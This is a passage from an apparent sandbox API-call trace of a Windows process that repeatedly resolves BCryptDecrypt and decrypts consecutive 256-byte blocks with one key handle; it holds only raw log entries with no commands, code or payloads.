dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205aea5, pcbResult=0x14f8fc) returned 0x0 [0177.254] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.254] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e97ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205af9a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205af9a, pcbResult=0x14f8fc) returned 0x0 [0177.255] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.255] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e97fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205b08f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205b08f, pcbResult=0x14f8fc) returned 0x0 [0177.257] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.257] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e980d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205b184, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205b184, pcbResult=0x14f8fc) returned 0x0 [0177.258] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.258] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e981d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205b279, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205b279, pcbResult=0x14f8fc) returned 0x0 [0177.260] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.260] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e982d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205b36e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205b36e, pcbResult=0x14f8fc) returned 0x0 [0177.261] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.261] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e983d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205b463, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205b463, pcbResult=0x14f8fc) returned 0x0 [0177.262] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.263] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e984d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205b558, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205b558, pcbResult=0x14f8fc) returned 0x0 [0177.264] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.400] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e985d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205b64d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205b64d, pcbResult=0x14f8fc) returned 0x0 [0177.402] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.402] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e986d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205b742, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205b742, pcbResult=0x14f8fc) returned 0x0 [0177.404] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.404] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e987d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205b837, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205b837, pcbResult=0x14f8fc) returned 0x0 [0177.405] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.405] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e988d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205b92c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205b92c, pcbResult=0x14f8fc) returned 0x0 [0177.407] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.407] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e989d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205ba21, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205ba21, pcbResult=0x14f8fc) returned 0x0 [0177.408] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.408] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e98ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205bb16, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205bb16, pcbResult=0x14f8fc) returned 0x0 [0177.409] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.409] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e98bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205bc0b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205bc0b, pcbResult=0x14f8fc) returned 0x0 [0177.411] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.411] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e98cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205bd00, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205bd00, pcbResult=0x14f8fc) returned 0x0 [0177.412] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.412] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e98dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205bdf5, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205bdf5, pcbResult=0x14f8fc) returned 0x0 [0177.413] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.414] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e98ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205beea, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205beea, pcbResult=0x14f8fc) returned 0x0 [0177.415] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.415] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e98fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205bfdf, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205bfdf, pcbResult=0x14f8fc) returned 0x0 [0177.417] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.417] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e990d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205c0d4, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205c0d4, pcbResult=0x14f8fc) returned 0x0 [0177.418] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.418] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e991d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205c1c9, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205c1c9, pcbResult=0x14f8fc) returned 0x0 [0177.419] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.419] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e992d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205c2be, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205c2be, pcbResult=0x14f8fc) returned 0x0 [0177.421] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.421] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e993d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205c3b3, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205c3b3, pcbResult=0x14f8fc) returned 0x0 [0177.422] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.422] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e994d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205c4a8, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205c4a8, pcbResult=0x14f8fc) returned 0x0 [0177.424] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.424] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e995d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205c59d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205c59d, pcbResult=0x14f8fc) returned 0x0 [0177.426] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.426] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e996d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205c692, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205c692, pcbResult=0x14f8fc) returned 0x0 [0177.427] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.427] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e997d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205c787, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205c787, pcbResult=0x14f8fc) returned 0x0 [0177.429] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.429] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e998d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205c87c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205c87c, pcbResult=0x14f8fc) returned 0x0 [0177.430] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.430] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e999d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205c971, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205c971, pcbResult=0x14f8fc) returned 0x0 [0177.431] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.431] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e99ad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205ca66, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205ca66, pcbResult=0x14f8fc) returned 0x0 [0177.433] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.433] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e99bd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205cb5b, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205cb5b, pcbResult=0x14f8fc) returned 0x0 [0177.574] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.574] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e99cd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205cc50, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205cc50, pcbResult=0x14f8fc) returned 0x0 [0177.576] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.576] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e99dd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205cd45, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205cd45, pcbResult=0x14f8fc) returned 0x0 [0177.578] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.578] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e99ed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205ce3a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205ce3a, pcbResult=0x14f8fc) returned 0x0 [0177.580] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.580] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e99fd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205cf2f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205cf2f, pcbResult=0x14f8fc) returned 0x0 [0177.583] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.583] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9a0d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205d024, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205d024, pcbResult=0x14f8fc) returned 0x0 [0177.585] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.585] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9a1d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205d119, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205d119, pcbResult=0x14f8fc) returned 0x0 [0177.587] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.587] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9a2d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205d20e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205d20e, pcbResult=0x14f8fc) returned 0x0 [0177.589] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.589] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9a3d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205d303, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205d303, pcbResult=0x14f8fc) returned 0x0 [0177.591] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.591] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9a4d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205d3f8, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205d3f8, pcbResult=0x14f8fc) returned 0x0 [0177.593] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.593] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9a5d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205d4ed, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205d4ed, pcbResult=0x14f8fc) returned 0x0 [0177.596] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.596] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9a6d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205d5e2, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205d5e2, pcbResult=0x14f8fc) returned 0x0 [0177.597] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.598] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9a7d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205d6d7, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205d6d7, pcbResult=0x14f8fc) returned 0x0 [0177.600] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.600] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9a8d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205d7cc, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205d7cc, pcbResult=0x14f8fc) returned 0x0 [0177.602] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.602] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9a9d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205d8c1, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205d8c1, pcbResult=0x14f8fc) returned 0x0 [0177.604] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.604] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9aad0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205d9b6, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205d9b6, pcbResult=0x14f8fc) returned 0x0 [0177.606] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.606] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9abd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205daab, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205daab, pcbResult=0x14f8fc) returned 0x0 [0177.608] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.608] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9acd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205dba0, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205dba0, pcbResult=0x14f8fc) returned 0x0 [0177.748] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.748] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9add0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205dc95, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205dc95, pcbResult=0x14f8fc) returned 0x0 [0177.750] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.750] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9aed0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205dd8a, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205dd8a, pcbResult=0x14f8fc) returned 0x0 [0177.752] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.752] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9afd0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205de7f, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205de7f, pcbResult=0x14f8fc) returned 0x0 [0177.754] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.755] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9b0d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205df74, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205df74, pcbResult=0x14f8fc) returned 0x0 [0177.757] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.757] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9b1d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205e069, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205e069, pcbResult=0x14f8fc) returned 0x0 [0177.759] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.759] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9b2d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205e15e, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205e15e, pcbResult=0x14f8fc) returned 0x0 [0177.761] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.761] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9b3d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205e253, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205e253, pcbResult=0x14f8fc) returned 0x0 [0177.763] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.763] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9b4d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205e348, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205e348, pcbResult=0x14f8fc) returned 0x0 [0177.765] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.765] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9b5d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205e43d, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205e43d, pcbResult=0x14f8fc) returned 0x0 [0177.767] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.767] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9b6d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205e532, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205e532, pcbResult=0x14f8fc) returned 0x0 [0177.769] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.770] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9b7d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205e627, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205e627, pcbResult=0x14f8fc) returned 0x0 [0177.772] GetProcAddress (hModule=0x7ffc5bcc0000, lpProcName="BCryptDecrypt") returned 0x7ffc5bcc5780 [0177.772] BCryptDecrypt (in: hKey=0x2c82b00, pbInput=0x1e9b8d0, cbInput=0x100, pPaddingInfo=0x0, pbIV=0x0, cbIV=0x0, pbOutput=0x205e71c, cbOutput=0xf5, pcbResult=0x14f8fc, dwFlags=0x2 | out: hKey=0x2c82b00, pbIV=0x0, pbOutput=0x205e71c, pcbResult=0x14f8fc) returned 0x0 [0177.774] 